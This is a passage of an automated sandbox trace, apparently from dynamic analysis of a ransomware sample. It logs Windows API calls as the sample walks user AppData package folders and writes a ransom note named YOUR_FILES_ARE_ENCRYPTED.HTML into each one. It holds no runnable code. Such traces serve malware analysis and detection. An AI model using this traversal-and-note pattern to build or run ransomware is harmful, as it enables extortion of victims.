lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\TempState" [0121.017] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\TempState\\*" [0121.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.017] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.017] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0121.017] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.017] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0121.017] GetProcessHeap () returned 0x600000 [0121.017] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0121.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.018] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.019] CloseHandle (hObject=0x320) returned 1 [0121.019] GetProcessHeap () returned 0x600000 [0121.019] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.019] GetProcessHeap () returned 0x600000 [0121.019] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.019] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d41224c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d41224c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0121.019] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.019] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.019] GetProcessHeap () returned 0x600000 [0121.019] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0121.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.020] WriteFile (in: hFile=0x214, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.021] CloseHandle (hObject=0x214) returned 1 [0121.021] GetProcessHeap () returned 0x600000 [0121.021] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.021] GetProcessHeap () returned 0x600000 [0121.021] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.023] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6f958d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.ZuneMusic_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.ZUN")) returned 1 [0121.023] StrStrIW (lpFirst="Microsoft.ZuneMusic_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.023] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe") returned 82 [0121.023] GetProcessHeap () returned 0x600000 [0121.023] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.024] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe" [0121.024] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\*" [0121.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6f958d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.026] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6f958d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0121.026] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0121.026] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.026] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC") returned 85 [0121.026] GetProcessHeap () returned 0x600000 [0121.026] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.027] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC" [0121.027] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\*" [0121.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.031] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 1 [0121.031] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0121.031] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.031] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache") returned 95 [0121.031] GetProcessHeap () returned 0x600000 [0121.031] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.032] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache" [0121.032] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\*" [0121.032] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0121.035] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName="..", cAlternateFileName="")) returned 1 [0121.035] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName="..", cAlternateFileName="")) returned 0 [0121.035] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0121.035] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0121.035] GetProcessHeap () returned 0x600000 [0121.035] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.036] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.037] CloseHandle (hObject=0x320) returned 1 [0121.037] GetProcessHeap () returned 0x600000 [0121.037] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.037] GetProcessHeap () returned 0x600000 [0121.037] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.037] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0121.038] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.038] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies") returned 97 [0121.038] GetProcessHeap () returned 0x600000 [0121.038] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.038] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies" [0121.038] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0121.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.038] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName="..", cAlternateFileName="")) returned 1 [0121.038] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName="..", cAlternateFileName="")) returned 0 [0121.038] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.038] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0121.038] GetProcessHeap () returned 0x600000 [0121.038] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.039] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.040] CloseHandle (hObject=0x320) returned 1 [0121.040] GetProcessHeap () returned 0x600000 [0121.040] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.040] GetProcessHeap () returned 0x600000 [0121.040] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.040] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0121.040] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.040] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory") returned 97 [0121.040] GetProcessHeap () returned 0x600000 [0121.040] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.040] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory" [0121.040] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0121.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, 